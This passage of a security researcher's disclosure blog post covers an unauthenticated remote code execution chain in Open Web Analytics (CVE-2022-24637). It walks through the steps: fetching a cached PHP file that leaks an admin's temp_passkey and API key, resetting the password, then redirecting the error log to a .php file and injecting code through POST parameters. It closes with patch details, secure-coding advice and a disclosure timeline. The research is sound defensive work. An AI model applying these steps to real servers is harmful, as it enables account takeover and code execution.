user@b0x:~$ curl http://localhost/owa\_web/owa-data/caches/1/owa\_user/xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.php

<?php\\n/\*Tzo4OiJvd2FfdXNlciI6NTp7czo0OiJ ... YWNoZSI7Tjt9\*/\\n?>

The base64 encoded data contains all properties of the user within the MySQL database including the username, hashed password, temp\_passkey and API key:

user@b0x:~$ echo Tzo4OiJvd2FfdXNlciI6NTp7czo0OiJ ... YWNoZSI7Tjt9 | base64 -d
O:8:"owa\_user":5:{s:4:"name";s:9:"base.user";s:10:"properties"; ...
...
... s:4:"name";N;s:5:"value";s:5:"admin"; ...
... s:8:"password";O:12:"owa\_dbColumn":11:{s:4:"name";N;s:5:"value";s:60:"$2y$10$vT89Rpbp/kz92SdR2j03luLVFOy7ldaqdyOIpTmFtmp2WGGOmFIwS"; ...
... s:12:"temp\_passkey";O:12:"owa\_dbColumn":11:{s:4:"name";N;s:5:"value";s:32:"d7d8c0d6c8da08adea071fa80220b121"; ...
... s:7:"api\_key";s:5:"value";s:32:"2f37b9889afb326b2ae21a5eb45933bd"; ...
...
}s:12:"wasPersisted";b:1;s:5:"cache";N;}

The password is hashed and thus needs to be cracked before being valuable. Though the temp\_passkey can directly be used to set a new password for the user via the base.usersChangePassword action. After changing the password, an attacker can successfully login and now has full admin privileges.

**PHP file write**

The second vulnerability is a PHP file write, which requires admin privileges.

By browsing to the Settings tab in the admin interface, different options can be set:

When updating the settings (action base.optionsUpdate) the controller owa\_optionsUpdateController is triggered, which is responsible for persisting the new settings:

class owa\_optionsUpdateController extends owa\_adminController {

    ...

    function action() {

        $c = owa\_coreAPI::configSingleton();

        $config\_values = $this->get('config');

        if (!empty($config\_values)) {

            foreach ($config\_values as $k => $v) {

                list($module, $name) = explode('.', $k);

                if ( $module && $name ) {
                    $c->persistSetting($module, $name, $v);
                }
            }

            $c->save();
            owa\_coreAPI::notice("Configuration changes saved to database.");
            $this->setStatusCode(2500);
        }

        $this->setRedirectAction('base.optionsGeneral');
    }

    ...

The selected settings are sent via the config parameter ($config\_values). As we can see there is no restriction on the settings we can define. Although only a few settings are displayed in the GUI on the Settings tab, we can change all other settings by crafting a corresponding POST request.

Two of these settings are used within the owa\_error class, which is responsible for logging. When the application is running in production mode, the method createProductionHandler is called to initialize the logfile by calling make\_file\_logger:

...
class owa\_error {

    ...

    function createProductionHandler() {

        ...
        
        $this->make\_file\_logger();

        ...
    }
    
    ...
    
    function make\_file\_logger() {

        $path = owa\_coreAPI::getSetting('base', 'error\_log\_file');
        //instantiate a a log file
        $conf = array('name' => 'debug\_log', 'file\_path' => $path);
        $this->loggers\['file'\] = owa\_coreAPI::supportClassFactory( 'base', 'logFile', $conf );
    }

As we can see the file path of the logfile is determined by calling the owa\_coreAPI::getSetting method. The setting being used is base.error\_log\_file. We can control this value and thus control the file path, where the log is being written. This means that we can also set the file path to be a PHP file. In order to execute arbitrary PHP code, we only need to control some data, which is written to the logfile.

By default the application is only logging events with the log level OWA\_LOG\_NOTICE. These messages are mainly static and do not contain any data, which can be controlled by an attacker. Thus let’s have a look at the logging mechanism.

When a message is supposed to be logged, the method logMsg is called with the corresponding priority (log level):

    function logMsg( $msg, $priority ) {

        ...
        
        // check error priority before logging.
        if ( owa\_coreAPI::getSetting('base', 'error\_log\_level') <= $priority ) {

            $dt = date("H:i:s Y-m-d");
            $pid = getmypid();
            foreach ( $this->loggers as $logger ) {

                $message = sprintf("%s %s \[%s\] %s \\n", $dt, $pid, $logger->name, $msg);
                $logger->append( $message );
                ...

The code snippet above shows that before the message is actually logged, the value of base.error\_log\_level is checked. If the $priority value is greater or equal than the current base.error\_log\_level, the message is logged. We can also control the value of base.error\_log\_level. By setting this value to OWA\_LOG\_DEBUG = 2, the messages being logged are very verbose and even include each POST parameter send to the application. This way an attacker can easily inject arbitrary PHP code into the logfile. By accessing this logfile, which was set to a PHP file, the injected code is executed resulting in RCE.

**Demonstration**

The combination of both vulnerabilities can be leveraged by an unauthenticated attacker to gain RCE as the following demonstration shows:

**Patch and Mitigations**

Within this section we want to determine how both of these vulnerabilities can be mitigated and point out a few general aspects regarding secure coding.

Only shortly after my notification Peter provided a patch for the file cache vulnerability (CVE-2022-24637). This patch tackles the vulnerability on multiple layers. At first single quotes for the cache\_file\_header and cache\_file\_footer are replaced by double quotes preventing the leak, which was the actual cause of the vulnerability. Though the patch contains further hardening. The secret OWA\_AUTH\_KEY value is included into the cache filename calculation. Without knowing this value, it is far harder to determine the name of the cache file. Also the owa\_user entity was removed from the cache at all. Thus there is no cache file for user entities. Not part of the above commit, but also a crucial mitigation is to prevent files from being accessed via the webserver, which are not supposed to be accessed directly. One way to achieve this is to move all files out of the webroot, which are not supposed to be accessed via the webserver. The problem with this solution is that the website administrator needs file system access beyond the webroot. Depending on the hosting or security model this might not be intended. Another way is to use a webserver specific restriction mechanism like an .htaccess file, when an apache webserver is in place.

The second vulnerability is quite common for PHP. File writes should really be handled carefully. If an attacker can control what is being written to a file, RCE is not far away. Even if the file does not reside within the webroot or does not have a .php extension, an additional local file inclusion (LFI) vulnerability, which might be useless on its own, turns this into easy RCE. In this case a restriction should enforce that the logfile can only be a .txt file. Also this file should not reside within the webroot, if viable. This restriction must be enforced, if there is the necessity of making the file path configurable. Generally the settings, which are configurable via the webinterface, should be very limited. A more adequate way to make sensitive settings configurable is by defining constant values in a config file. These can only be changed by actually altering the config file (which in the best case should only be possible to the legitimate website administrator).

Summing up, the key takeaways are:

*   Mind the difference between single and double quotes in PHP
*   When hashing values, add a secret pepper / salt value
*   Do not store any files in the webroot, which are not supposed to be accessed via the webserver, or employ restrictions to prevent direct access to these files
*   Carefully restrict file writes (content, file path and extension)
*   Restrict which settings are configurable via the webinterface

**Conclusion**

The article described the chaining of two vulnerabilities in OWA, which can be exploited by an unauthenticated attacker to gain RCE on the underlying webserver. Also we took a look at how these vulnerabilities can be mitigated and pointed out a few general aspects regarding secure coding.

Thanks again to Peter for professionally handling these issues and quickly providing a patch.

**Timeline**  
01 February 2022 – Vendor Notification  
01 February 2022 – Vendor Acknowledgement  
02 February 2022 – Vendor Patch  
18 March 2022 – Public Disclosure

Post Views: 14,875

Tag

#google